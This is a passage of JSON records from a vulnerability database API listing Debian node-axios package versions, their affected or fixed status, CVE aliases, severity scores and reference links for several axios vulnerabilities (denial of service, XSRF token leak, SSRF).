-wbq8-z3qg-bfbt"},{"vulnerability":"VCID-x41s-g5mh-pkdq"},{"vulnerability":"VCID-z6xx-7p9v-gqc6"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:deb/debian/node-axios@1.8.4%252Bdfsg-1%3Fdistro=trixie"},{"url":"http://public2.vulnerablecode.io/api/packages/932082?format=json","purl":"pkg:deb/debian/node-axios@1.14.0%2Bdfsg-1?distro=trixie","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:deb/debian/node-axios@1.14.0%252Bdfsg-1%3Fdistro=trixie"},{"url":"http://public2.vulnerablecode.io/api/packages/1062504?format=json","purl":"pkg:deb/debian/node-axios@1.15.0-1?distro=trixie","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-671j-k4zn-xbgk"},{"vulnerability":"VCID-8352-4tud-y3f4"},{"vulnerability":"VCID-cj5w-7hbe-wqex"},{"vulnerability":"VCID-drqq-9mkv-qkbx"},{"vulnerability":"VCID-e86t-8z3n-sqgd"},{"vulnerability":"VCID-gtc3-vrcs-yfb9"},{"vulnerability":"VCID-nmzm-1341-jfgt"},{"vulnerability":"VCID-p78g-vmhn-yyck"},{"vulnerability":"VCID-tdwz-gg36-mkgs"},{"vulnerability":"VCID-uuzj-ta8k-c3fn"},{"vulnerability":"VCID-wbq8-z3qg-bfbt"},{"vulnerability":"VCID-z6xx-7p9v-gqc6"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:deb/debian/node-axios@1.15.0-1%3Fdistro=trixie"},{"url":"http://public2.vulnerablecode.io/api/packages/1077457?format=json","purl":"pkg:deb/debian/node-axios@1.15.2-1?distro=trixie","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:deb/debian/node-axios@1.15.2-1%3Fdistro=trixie"}],"aliases":["CVE-2024-57965"],"risk_score":1.5,"exploitability":"0.5","weighted_severity":"3.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-1vkx-cwua-rqe4"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/10636?format=json","vulnerability_id":"VCID-5b5u-3ngh-4fd9","summary":"Denial of Service\nAxios allows attackers to cause a denial of service (application crash) by continuing to accepting content after `maxContentLength` is exceeded.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2019-10742","reference_id":"","reference_type":"","scores":[{"value":"0.1309","scoring_system":"epss","scoring_elements":"0.94105","published_at":"2026-04-09T12:55:00Z"},{"value":"0.1309","scoring_system":"epss","scoring_elements":"0.94139","published_at":"2026-05-05T12:55:00Z"},{"value":"0.1309","scoring_system":"epss","scoring_elements":"0.94134","published_at":"2026-04-29T12:55:00Z"},{"value":"0.1309","scoring_system":"epss","scoring_elements":"0.94133","published_at":"2026-04-24T12:55:00Z"},{"value":"0.1309","scoring_system":"epss","scoring_elements":"0.94131","published_at":"2026-04-21T12:55:00Z"},{"value":"0.1309","scoring_system":"epss","scoring_elements":"0.94126","published_at":"2026-04-16T12:55:00Z"},{"value":"0.1309","scoring_system":"epss","scoring_elements":"0.94092","published_at":"2026-04-07T12:55:00Z"},{"value":"0.1309","scoring_system":"epss","scoring_elements":"0.94101","published_at":"2026-04-08T12:55:00Z"},{"value":"0.1309","scoring_system":"epss","scoring_elements":"0.9411","published_at":"2026-04-13T12:55:00Z"},{"value":"0.1352","scoring_system":"epss","scoring_elements":"0.94199","published_at":"2026-04-04T12:55:00Z"},{"value":"0.1352","scoring_system":"epss","scoring_elements":"0.94177","published_at":"2026-04-01T12:55:00Z"},{"value":"0.1352","scoring_system":"epss","scoring_elements":"0.94187","published_at":"2026-04-02T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2019-10742"},{"reference_url":"https://app.snyk.io/vuln/SNYK-JS-AXIOS-174505","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://app.snyk.io/vuln/SNYK-JS-AXIOS-174505"},{"reference_url":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-10742","reference_id":"","reference_type":"","scores":[],"url":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-10742"},{"reference_url":"https://github.com/axios/axios/commit/acabfbdf00a58bb866c9d070e8a10d1d0dbeb572","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/axios/axios/commit/acabfbdf00a58bb866c9d070e8a10d1d0dbeb572"},{"reference_url":"https://github.com/axios/axios/issues/1098","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/axios/axios/issues/1098"},{"reference_url":"https://github.com/axios/axios/pull/1485","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/axios/axios/pull/1485"},{"reference_url":"https://snyk.io/vuln/SNYK-JS-AXIOS-174505","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://snyk.io/vuln/SNYK-JS-AXIOS-174505"},{"reference_url":"https://www.npmjs.com/advisories/880","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://www.npmjs.com/advisories/880"},{"reference_url":"https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=928624","reference_id":"928624","reference_type":"","scores":[],"url":"https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=928624"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2019-10742","reference_id":"CVE-2019-10742","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2019-10742"},{"reference_url":"https://github.com/advisories/GHSA-42xw-2xvc-qx8m","reference_id":"GHSA-42xw-2xvc-qx8m","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-42xw-2xvc-qx8m"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/932080?format=json","purl":"pkg:deb/debian/node-axios@0.17.1%2Bdfsg-2?distro=trixie","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:deb/debian/node-axios@0.17.1%252Bdfsg-2%3Fdistro=trixie"},{"url":"http://public2.vulnerablecode.io/api/packages/932081?format=json","purl":"pkg:deb/debian/node-axios@0.21.1%2Bdfsg-1%2Bdeb11u1?distro=trixie","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1vkx-cwua-rqe4"},{"vulnerability":"VCID-671j-k4zn-xbgk"},{"vulnerability":"VCID-7rdk-mw2k-eqdx"},{"vulnerability":"VCID-8352-4tud-y3f4"},{"vulnerability":"VCID-aq84-8cnz-byax"},{"vulnerability":"VCID-axk7-6q4b-vuga"},{"vulnerability":"VCID-cj5w-7hbe-wqex"},{"vulnerability":"VCID-drqq-9mkv-qkbx"},{"vulnerability":"VCID-e86t-8z3n-sqgd"},{"vulnerability":"VCID-ek49-tuj4-t3ap"},{"vulnerability":"VCID-gtc3-vrcs-yfb9"},{"vulnerability":"VCID-hq6f-86aj-8yav"},{"vulnerability":"VCID-kgnf-z6ca-tqgp"},{"vulnerability":"VCID-nmzm-1341-jfgt"},{"vulnerability":"VCID-p78g-vmhn-yyck"},{"vulnerability":"VCID-tdwz-gg36-mkgs"},{"vulnerability":"VCID-uuzj-ta8k-c3fn"},{"vulnerability":"VCID-wbq8-z3qg-bfbt"},{"vulnerability":"VCID-x41s-g5mh-pkdq"},{"vulnerability":"VCID-z6xx-7p9v-gqc6"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:deb/debian/node-axios@0.21.1%252Bdfsg-1%252Bdeb11u1%3Fdistro=trixie"},{"url":"http://public2.vulnerablecode.io/api/packages/932079?format=json","purl":"pkg:deb/debian/node-axios@1.2.1%2Bdfsg-1%2Bdeb12u1?distro=trixie","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-671j-k4zn-xbgk"},{"vulnerability":"VCID-8352-4tud-y3f4"},{"vulnerability":"VCID-aq84-8cnz-byax"},{"vulnerability":"VCID-axk7-6q4b-vuga"},{"vulnerability":"VCID-cj5w-7hbe-wqex"},{"vulnerability":"VCID-drqq-9mkv-qkbx"},{"vulnerability":"VCID-e86t-8z3n-sqgd"},{"vulnerability":"VCID-ek49-tuj4-t3ap"},{"vulnerability":"VCID-gtc3-vrcs-yfb9"},{"vulnerability":"VCID-hq6f-86aj-8yav"},{"vulnerability":"VCID-kgnf-z6ca-tqgp"},{"vulnerability":"VCID-nmzm-1341-jfgt"},{"vulnerability":"VCID-p78g-vmhn-yyck"},{"vulnerability":"VCID-tdwz-gg36-mkgs"},{"vulnerability":"VCID-uuzj-ta8k-c3fn"},{"vulnerability":"VCID-wbq8-z3qg-bfbt"},{"vulnerability":"VCID-x41s-g5mh-pkdq"},{"vulnerability":"VCID-z6xx-7p9v-gqc6"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:deb/debian/node-axios@1.2.1%252Bdfsg-1%252Bdeb12u1%3Fdistro=trixie"},{"url":"http://public2.vulnerablecode.io/api/packages/932083?format=json","purl":"pkg:deb/debian/node-axios@1.8.4%2Bdfsg-1?distro=trixie","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-671j-k4zn-xbgk"},{"vulnerability":"VCID-8352-4tud-y3f4"},{"vulnerability":"VCID-aq84-8cnz-byax"},{"vulnerability":"VCID-axk7-6q4b-vuga"},{"vulnerability":"VCID-cj5w-7hbe-wqex"},{"vulnerability":"VCID-drqq-9mkv-qkbx"},{"vulnerability":"VCID-e86t-8z3n-sqgd"},{"vulnerability":"VCID-ek49-tuj4-t3ap"},{"vulnerability":"VCID-gtc3-vrcs-yfb9"},{"vulnerability":"VCID-kgnf-z6ca-tqgp"},{"vulnerability":"VCID-nmzm-1341-jfgt"},{"vulnerability":"VCID-p78g-vmhn-yyck"},{"vulnerability":"VCID-tdwz-gg36-mkgs"},{"vulnerability":"VCID-uuzj-ta8k-c3fn"},{"vulnerability":"VCID-wbq8-z3qg-bfbt"},{"vulnerability":"VCID-x41s-g5mh-pkdq"},{"vulnerability":"VCID-z6xx-7p9v-gqc6"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:deb/debian/node-axios@1.8.4%252Bdfsg-1%3Fdistro=trixie"},{"url":"http://public2.vulnerablecode.io/api/packages/932082?format=json","purl":"pkg:deb/debian/node-axios@1.14.0%2Bdfsg-1?distro=trixie","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:deb/debian/node-axios@1.14.0%252Bdfsg-1%3Fdistro=trixie"},{"url":"http://public2.vulnerablecode.io/api/packages/1062504?format=json","purl":"pkg:deb/debian/node-axios@1.15.0-1?distro=trixie","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-671j-k4zn-xbgk"},{"vulnerability":"VCID-8352-4tud-y3f4"},{"vulnerability":"VCID-cj5w-7hbe-wqex"},{"vulnerability":"VCID-drqq-9mkv-qkbx"},{"vulnerability":"VCID-e86t-8z3n-sqgd"},{"vulnerability":"VCID-gtc3-vrcs-yfb9"},{"vulnerability":"VCID-nmzm-1341-jfgt"},{"vulnerability":"VCID-p78g-vmhn-yyck"},{"vulnerability":"VCID-tdwz-gg36-mkgs"},{"vulnerability":"VCID-uuzj-ta8k-c3fn"},{"vulnerability":"VCID-wbq8-z3qg-bfbt"},{"vulnerability":"VCID-z6xx-7p9v-gqc6"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:deb/debian/node-axios@1.15.0-1%3Fdistro=trixie"},{"url":"http://public2.vulnerablecode.io/api/packages/1077457?format=json","purl":"pkg:deb/debian/node-axios@1.15.2-1?distro=trixie","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:deb/debian/node-axios@1.15.2-1%3Fdistro=trixie"}],"aliases":["CVE-2019-10742","GHSA-42xw-2xvc-qx8m"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-5b5u-3ngh-4fd9"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/19716?format=json","vulnerability_id":"VCID-7rdk-mw2k-eqdx","summary":"Axios Cross-Site Request Forgery Vulnerability\nAn issue discovered in Axios 1.5.1 inadvertently reveals the confidential XSRF-TOKEN stored in cookies by including it in the HTTP header X-XSRF-TOKEN for every request made to any host allowing attackers to view sensitive information.","references":[{"reference_url":"https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2023-45857.json","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N"}],"url":"https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2023-45857.json"},{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2023-45857","reference_id":"","reference_type":"","scores":[{"value":"0.00132","scoring_system":"epss","scoring_elements":"0.32738","published_at":"2026-04-12T12:55:00Z"},{"value":"0.00132","scoring_system":"epss","scoring_elements":"0.32711","published_at":"2026-04-13T12:55:00Z"},{"value":"0.00132","scoring_system":"epss","scoring_elements":"0.32775","published_at":"2026-04-11T12:55:00Z"},{"value":"0.00132","scoring_system":"epss","scoring_elements":"0.32773","published_at":"2026-04-09T12:55:00Z"},{"value":"0.00132","scoring_system":"epss","scoring_elements":"0.32747","published_at":"2026-04-08T12:55:00Z"},{"value":"0.00132","scoring_system":"epss","scoring_elements":"0.32699","published_at":"2026-04-07T12:55:00Z"},{"value":"0.00132","scoring_system":"epss","scoring_elements":"0.32878","published_at":"2026-04-04T12:55:00Z"},{"value":"0.00132","scoring_system":"epss","scoring_elements":"0.32842","published_at":"2026-04-02T12:55:00Z"},{"value":"0.00132","scoring_system":"epss","scoring_elements":"0.32727","published_at":"2026-04-18T12:55:00Z"},{"value":"0.00132","scoring_system":"epss","scoring_elements":"0.32751","published_at":"2026-04-16T12:55:00Z"},{"value":"0.00135","scoring_system":"epss","scoring_elements":"0.33193","published_at":"2026-04-21T12:55:00Z"},{"value":"0.00135","scoring_system":"epss","scoring_elements":"0.3303","published_at":"2026-04-26T12:55:00Z"},{"value":"0.00135","scoring_system":"epss","scoring_elements":"0.33047","published_at":"2026-04-24T12:55:00Z"},{"value":"0.00147","scoring_system":"epss","scoring_elements":"0.34739","published_at":"2026-04-29T12:55:00Z"},{"value":"0.00161","scoring_system":"epss","scoring_elements":"0.3645","published_at":"2026-05-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2023-45857"},{"reference_url":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-45857","reference_id":"","reference_type":"","scores":[],"url":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-45857"},{"reference_url":"https://github.com/axios/axios","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/axios/axios"},{"reference_url":"https://github.com/axios/axios/commit/2755df562b9c194fba6d8b609a383443f6a6e967","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/axios/axios/commit/2755df562b9c194fba6d8b609a383443f6a6e967"},{"reference_url":"https://github.com/axios/axios/commit/96ee232bd3ee4de2e657333d4d2191cd389e14d0","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/axios/axios/commit/96ee232bd3ee4de2e657333d4d2191cd389e14d0"},{"reference_url":"https://github.com/axios/axios/issues/6006","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2024-09-04T15:13:57Z/"}],"url":"https://github.com/axios/axios/issues/6006"},{"reference_url":"https://github.com/axios/axios/issues/6022","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/axios/axios/issues/6022"},{"reference_url":"https://github.com/axios/axios/pull/6028","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/axios/axios/pull/6028"},{"reference_url":"https://github.com/axios/axios/pull/6091","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/axios/axios/pull/6091"},{"reference_url":"https://github.com/axios/axios/releases/tag/v0.28.0","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/axios/axios/releases/tag/v0.28.0"},{"reference_url":"https://github.com/axios/axios/releases/tag/v1.6.0","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/axios/axios/releases/tag/v1.6.0"},{"reference_url":"https://security.netapp.com/advisory/ntap-20240621-0006","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://security.netapp.com/advisory/ntap-20240621-0006"},{"reference_url":"https://security.snyk.io/vuln/SNYK-JS-AXIOS-6032459","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://security.snyk.io/vuln/SNYK-JS-AXIOS-6032459"},{"reference_url":"https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1056099","reference_id":"1056099","reference_type":"","scores":[],"url":"https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1056099"},{"reference_url":"https://bugzilla.redhat.com/show_bug.cgi?id=2248979","reference_id":"2248979","reference_type":"","scores":[],"url":"https://bugzilla.redhat.com/show_bug.cgi?id=2248979"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2023-45857","reference_id":"CVE-2023-45857","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2023-45857"},{"reference_url":"https://github.com/advisories/GHSA-wf5p-g6vw-rhxx","reference_id":"GHSA-wf5p-g6vw-rhxx","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-wf5p-g6vw-rhxx"},{"reference_url":"https://access.redhat.com/errata/RHSA-2024:1925","reference_id":"RHSA-2024:1925","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2024:1925"},{"reference_url":"https://access.redhat.com/errata/RHSA-2024:3314","reference_id":"RHSA-2024:3314","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2024:3314"},{"reference_url":"https://access.redhat.com/errata/RHSA-2024:3316","reference_id":"RHSA-2024:3316","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2024:3316"},{"reference_url":"https://access.redhat.com/errata/RHSA-2024:3473","reference_id":"RHSA-2024:3473","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2024:3473"},{"reference_url":"https://access.redhat.com/errata/RHSA-2024:3920","reference_id":"RHSA-2024:3920","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2024:3920"},{"reference_url":"https://access.redhat.com/errata/RHSA-2024:4269","reference_id":"RHSA-2024:4269","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2024:4269"},{"reference_url":"https://access.redhat.com/errata/RHSA-2024:4455","reference_id":"RHSA-2024:4455","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2024:4455"},{"reference_url":"https://access.redhat.com/errata/RHSA-2024:5314","reference_id":"RHSA-2024:5314","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2024:5314"},{"reference_url":"https://access.redhat.com/errata/RHSA-2025:2876","reference_id":"RHSA-2025:2876","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2025:2876"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/932079?format=json","purl":"pkg:deb/debian/node-axios@1.2.1%2Bdfsg-1%2Bdeb12u1?distro=trixie","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-671j-k4zn-xbgk"},{"vulnerability":"VCID-8352-4tud-y3f4"},{"vulnerability":"VCID-aq84-8cnz-byax"},{"vulnerability":"VCID-axk7-6q4b-vuga"},{"vulnerability":"VCID-cj5w-7hbe-wqex"},{"vulnerability":"VCID-drqq-9mkv-qkbx"},{"vulnerability":"VCID-e86t-8z3n-sqgd"},{"vulnerability":"VCID-ek49-tuj4-t3ap"},{"vulnerability":"VCID-gtc3-vrcs-yfb9"},{"vulnerability":"VCID-hq6f-86aj-8yav"},{"vulnerability":"VCID-kgnf-z6ca-tqgp"},{"vulnerability":"VCID-nmzm-1341-jfgt"},{"vulnerability":"VCID-p78g-vmhn-yyck"},{"vulnerability":"VCID-tdwz-gg36-mkgs"},{"vulnerability":"VCID-uuzj-ta8k-c3fn"},{"vulnerability":"VCID-wbq8-z3qg-bfbt"},{"vulnerability":"VCID-x41s-g5mh-pkdq"},{"vulnerability":"VCID-z6xx-7p9v-gqc6"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:deb/debian/node-axios@1.2.1%252Bdfsg-1%252Bdeb12u1%3Fdistro=trixie"},{"url":"http://public2.vulnerablecode.io/api/packages/932086?format=json","purl":"pkg:deb/debian/node-axios@1.6.2%2Bdfsg-1?distro=trixie","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:deb/debian/node-axios@1.6.2%252Bdfsg-1%3Fdistro=trixie"},{"url":"http://public2.vulnerablecode.io/api/packages/932083?format=json","purl":"pkg:deb/debian/node-axios@1.8.4%2Bdfsg-1?distro=trixie","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-671j-k4zn-xbgk"},{"vulnerability":"VCID-8352-4tud-y3f4"},{"vulnerability":"VCID-aq84-8cnz-byax"},{"vulnerability":"VCID-axk7-6q4b-vuga"},{"vulnerability":"VCID-cj5w-7hbe-wqex"},{"vulnerability":"VCID-drqq-9mkv-qkbx"},{"vulnerability":"VCID-e86t-8z3n-sqgd"},{"vulnerability":"VCID-ek49-tuj4-t3ap"},{"vulnerability":"VCID-gtc3-vrcs-yfb9"},{"vulnerability":"VCID-kgnf-z6ca-tqgp"},{"vulnerability":"VCID-nmzm-1341-jfgt"},{"vulnerability":"VCID-p78g-vmhn-yyck"},{"vulnerability":"VCID-tdwz-gg36-mkgs"},{"vulnerability":"VCID-uuzj-ta8k-c3fn"},{"vulnerability":"VCID-wbq8-z3qg-bfbt"},{"vulnerability":"VCID-x41s-g5mh-pkdq"},{"vulnerability":"VCID-z6xx-7p9v-gqc6"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:deb/debian/node-axios@1.8.4%252Bdfsg-1%3Fdistro=trixie"},{"url":"http://public2.vulnerablecode.io/api/packages/932082?format=json","purl":"pkg:deb/debian/node-axios@1.14.0%2Bdfsg-1?distro=trixie","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:deb/debian/node-axios@1.14.0%252Bdfsg-1%3Fdistro=trixie"},{"url":"http://public2.vulnerablecode.io/api/packages/1062504?format=json","purl":"pkg:deb/debian/node-axios@1.15.0-1?distro=trixie","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-671j-k4zn-xbgk"},{"vulnerability":"VCID-8352-4tud-y3f4"},{"vulnerability":"VCID-cj5w-7hbe-wqex"},{"vulnerability":"VCID-drqq-9mkv-qkbx"},{"vulnerability":"VCID-e86t-8z3n-sqgd"},{"vulnerability":"VCID-gtc3-vrcs-yfb9"},{"vulnerability":"VCID-nmzm-1341-jfgt"},{"vulnerability":"VCID-p78g-vmhn-yyck"},{"vulnerability":"VCID-tdwz-gg36-mkgs"},{"vulnerability":"VCID-uuzj-ta8k-c3fn"},{"vulnerability":"VCID-wbq8-z3qg-bfbt"},{"vulnerability":"VCID-z6xx-7p9v-gqc6"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:deb/debian/node-axios@1.15.0-1%3Fdistro=trixie"},{"url":"http://public2.vulnerablecode.io/api/packages/1077457?format=json","purl":"pkg:deb/debian/node-axios@1.15.2-1?distro=trixie","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:deb/debian/node-axios@1.15.2-1%3Fdistro=trixie"}],"aliases":["CVE-2023-45857","GHSA-wf5p-g6vw-rhxx"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-7rdk-mw2k-eqdx"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/15996?format=json","vulnerability_id":"VCID-epu9-wdt3-kbay","summary":"Server-Side Request Forgery in axios\naxios 1.7.2 allows SSRF via unexpected behavior where requests for path relative URLs get processed as protocol relative URLs.","references":[{"reference_url":"https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2024-39338.json","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"}],"url":"https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2024-39338.json"},{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2024-39338","reference_id":"","reference_type":"","scores":[{"value":"0.02141","scoring_system":"epss","scoring_elements":"0.84295","published_at":"2026-05-05T12:55:00Z"},{"value":"0.02141","scoring_system":"epss","scoring_elements":"0.84277","published_at":"2026-04-29T12:55:00Z"},{"value":"0.0288","scoring_system":"epss","scoring_elements":"0.86309","published_at":"2026-04-21T12:55:00Z"},{"value":"0.0288","scoring_system":"epss","scoring_elements":"0.86315","published_at":"2026-04-18T12:55:00Z"},{"value":"0.0288","scoring_system":"epss","scoring_elements":"0.86311","published_at":"2026-04-16T12:55:00Z"},{"value":"0.0288","scoring_system":"epss","scoring_elements":"0.86295","published_at":"2026-04-13T12:55:00Z"},{"value":"0.0288","scoring_system":"epss","scoring_elements":"0.86298","published_at":"2026-04-12T12:55:00Z"},{"value":"0.0288","scoring_system":"epss","scoring_elements":"0.86301","published_at":"2026-04-11T12:55: